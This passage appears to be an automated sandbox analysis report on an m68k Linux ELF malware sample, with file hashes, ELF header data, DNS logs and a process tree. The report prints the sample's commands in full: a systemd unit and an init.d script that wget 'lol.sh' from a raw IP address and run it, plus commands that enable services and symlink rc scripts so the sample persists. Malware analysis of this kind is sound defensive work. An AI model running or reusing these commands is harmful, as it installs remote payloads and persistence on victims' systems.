                              Entropy (8bit):5.074037697712534
                              Encrypted:false
                              SSDEEP:6:z8ifitRZAMzdK+xE02+GWRAZX47N2+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+xEp+GWRkKY+GWRXY+GWRuO
                              MD5:2F91AB7B81C3A38F93D897D4DC7DC97D
                              SHA1:EC4B9B9D494101FAA9F5AF9087782F67709BDADA
                              SHA-256:57ABDA64A5D4589CF09678A9913C096A5DF4459A1730EAC6CBF28AF921226BB3
                              SHA-512:38F903CE45694358A381D457EA829BC8E1DA505F27A1FB0A349FFB3A0035CC50BE547ADB316D74927C83A7EA936FDC94C1C4A9B40742E4C5DD7DA256CEF6CF85
                              Malicious:false
                              Preview:[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/m68k.nn.elf.ExecStartPost=/usr/bin/wget http://94.156.227.229/lol.sh -O /tmp/lol.sh.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.
                              Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):76
                              Entropy (8bit):3.7627880354948586
                              Encrypted:false
                              SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                              MD5:D86A1F5765F37989EB0EC3837AD13ECC
                              SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                              SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                              SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                              Malicious:false
                              Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                              Process:/tmp/m68k.nn.elf
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):17
                              Entropy (8bit):3.6168746059562227
                              Encrypted:false
                              SSDEEP:3:TgSC/ANln:TglOn
                              MD5:CF5BFD6A623ECC046218AA0EBA4D8FE7
                              SHA1:E3F0D3236A8D19B35DB7D7F81FECBA0A5D613E88
                              SHA-256:C3A372684D6533CABFEC9940A5B0C21F5CD8C12CE9FECD07DE6D5C5E31C00560
                              SHA-512:F2C31F4B0FA981357F508A6C3B32A3DAEDC609FDE9EC704411D022BE11643B7F6EC039421ACB9EDE5334ACA2A7F1068D5B55106F4BF46327A229E2A04D31547B
                              Malicious:false
                              Preview:/tmp/m68k.nn.elf.
                              File type:ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
                              Entropy (8bit):6.35670920543686
                              TrID:
                              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                              File name:m68k.nn.elf
                              File size:94'948 bytes
                              MD5:8845ad8ddea06d04b98a1c8dc9c97c56
                              SHA1:fddc02400f6189995b491b6f74f0fe0a4e9dd05b
                              SHA256:233e8137b8c1b925ca40c6851777a8ddd4859a2ddbdf282d670b0a918be000e0
                              SHA512:7b0992ccf98f4767a2b183cb23e2b381fb9632af0e7a8a3e3bd4d748b3e3f315a921f358166879e6c1ef2d9a73a6070bb7eb43104c0b12df5c7186ec1c32b2f8
                              SSDEEP:1536:cT9Xr6oLlGN5CxwDH6rEr10qR3i8eEs1P6BxPY8oMGfjDFfb16yOp:6tdlGN96rm10qR35s2P/obRLA
                              TLSH:4D935CC6FC01CE7EF81ED7BF50230519B621A3615A431F36A697BD97EDB61980823E81
                              File Content Preview:.ELF.......................D...4..qT.....4. ...(......................lF..lF...... .......lL...L...L......&....... .dt.Q............................NV..a....da...H.N^NuNV..J9....f>"y...d QJ.g.X.#....dN."y...d QJ.f.A.....J.g.Hy..lHN.X.........N^NuNV..N^NuN

                              ELF header

                              Class:ELF32
                              Data:2's complement, big endian
                              Version:1 (current)
                              Machine:MC68000
                              Version Number:0x1
                              Type:EXEC (Executable file)
                              OS/ABI:UNIX - System V
                              ABI Version:0
                              Entry Point Address:0x80000144
                              Flags:0x0
                              ELF Header Size:52
                              Program Header Offset:52
                              Program Header Size:32
                              Number of Program Headers:3
                              Section Header Offset:94548
                              Section Header Size:40
                              Number of Section Headers:10
                              Header String Table Index:9
                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                              NULL0x00x00x00x00x0000
                              .initPROGBITS0x800000940x940x140x00x6AX002
                              .textPROGBITS0x800000a80xa80x1482a0x00x6AX004
                              .finiPROGBITS0x800148d20x148d20xe0x00x6AX002
                              .rodataPROGBITS0x800148e00x148e00x23660x00x2A002
                              .ctorsPROGBITS0x80018c4c0x16c4c0x80x00x3WA004
                              .dtorsPROGBITS0x80018c540x16c540x80x00x3WA004
                              .dataPROGBITS0x80018c600x16c600x4b40x00x3WA004
                              .bssNOBITS0x800191140x171140x22100x00x3WA004
                              .shstrtabSTRTAB0x00x171140x3e0x00x0001
                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                              LOAD0x00x800000000x800000000x16c460x16c466.37210x5R E0x2000.init .text .fini .rodata
                              LOAD0x16c4c0x80018c4c0x80018c4c0x4c80x26d84.75700x6RW 0x2000.ctors .dtors .data .bss
                              GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                              TimestampSource PortDest PortSource IPDest IP
                              Dec 27, 2024 09:14:08.002656937 CET3318853192.168.2.138.8.8.8
                              Dec 27, 2024 09:14:08.002656937 CET5004753192.168.2.138.8.8.8
                              Dec 27, 2024 09:14:08.125109911 CET53500478.8.8.8192.168.2.13
                              Dec 27, 2024 09:14:08.136588097 CET53331888.8.8.8192.168.2.13
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Dec 27, 2024 09:14:08.002656937 CET192.168.2.138.8.8.80x698fStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                              Dec 27, 2024 09:14:08.002656937 CET192.168.2.138.8.8.80x390Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Dec 27, 2024 09:14:08.136588097 CET8.8.8.8192.168.2.130x698fNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                              Dec 27, 2024 09:14:08.136588097 CET8.8.8.8192.168.2.130x698fNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

                              System Behavior

                              Start time (UTC):08:14:04
                              Start date (UTC):27/12/2024
                              Path:/tmp/m68k.nn.elf
                              Arguments:/tmp/m68k.nn.elf
                              File size:4463432 bytes
                              MD5 hash:cd177594338c77b895ae27c33f8f86cc

                              Start time (UTC):08:14:04
                              Start date (UTC):27/12/2024
                              Path:/tmp/m68k.nn.elf
                              Arguments:-
                              File size:4463432 bytes
                              MD5 hash:cd177594338c77b895ae27c33f8f86cc

                              Start time (UTC):08:14:04
                              Start date (UTC):27/12/2024
                              Path:/bin/sh
                              Arguments:sh -c "systemctl enable custom.service >/dev/null 2>&1"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/usr/bin/systemctl
                              Arguments:systemctl enable custom.service
                              File size:996584 bytes
                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/tmp/m68k.nn.elf
                              Arguments:-
                              File size:4463432 bytes
                              MD5 hash:cd177594338c77b895ae27c33f8f86cc

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/bin/sh
                              Arguments:sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/usr/bin/chmod
                              Arguments:chmod +x /etc/init.d/system
                              File size:63864 bytes
                              MD5 hash:739483b900c045ae1374d6f53a86a279

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/tmp/m68k.nn.elf
                              Arguments:-
                              File size:4463432 bytes
                              MD5 hash:cd177594338c77b895ae27c33f8f86cc

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/bin/sh
                              Arguments:sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/usr/bin/ln
                              Arguments:ln -s /etc/init.d/system /etc/rcS.d/S99system
                              File size:76160 bytes
                              MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/tmp/m68k.nn.elf
                              Arguments:-
                              File size:4463432 bytes
                              MD5 hash:cd177594338c77b895ae27c33f8f86cc

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/bin/sh
                              Arguments:sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/tmp/m68k.nn.elf
                              Arguments:-
                              File size:4463432 bytes
                              MD5 hash:cd177594338c77b895ae27c33f8f86cc

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/bin/sh
                              Arguments:sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/usr/bin/chmod
                              Arguments:chmod +x /etc/init.d/m68k.nn.elf
                              File size:63864 bytes
                              MD5 hash:739483b900c045ae1374d6f53a86a279

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/tmp/m68k.nn.elf
                              Arguments:-
                              File size:4463432 bytes
                              MD5 hash:cd177594338c77b895ae27c33f8f86cc

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/bin/sh
                              Arguments:sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/usr/bin/mkdir
                              Arguments:mkdir -p /etc/rc.d
                              File size:88408 bytes
                              MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/tmp/m68k.nn.elf
                              Arguments:-
                              File size:4463432 bytes
                              MD5 hash:cd177594338c77b895ae27c33f8f86cc

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/bin/sh
                              Arguments:sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/usr/bin/ln
                              Arguments:ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf
                              File size:76160 bytes
                              MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                              Start time (UTC):08:14:04
                              Start date (UTC):27/12/2024
                              Path:/usr/lib/udisks2/udisksd
                              Arguments:-
                              File size:483056 bytes
                              MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                              Start time (UTC):08:14:04
                              Start date (UTC):27/12/2024
                              Path:/usr/sbin/dumpe2fs
                              Arguments:dumpe2fs -h /dev/dm-0
                              File size:31112 bytes
                              MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/usr/lib/systemd/systemd
                              Arguments:-
                              File size:1620224 bytes
                              MD5 hash:9b2bec7092a40488108543f9334aab75

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                              File size:22760 bytes
                              MD5 hash:3633b075f40283ec938a2a6a89671b0e

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/usr/lib/udisks2/udisksd
                              Arguments:-
                              File size:483056 bytes
                              MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                              Start time (UTC):08:14:05
                              Start date (UTC):27/12/2024
                              Path:/usr/sbin/dumpe2fs
                              Arguments:dumpe2fs -h /dev/dm-0
                              File size:31112 bytes
                              MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4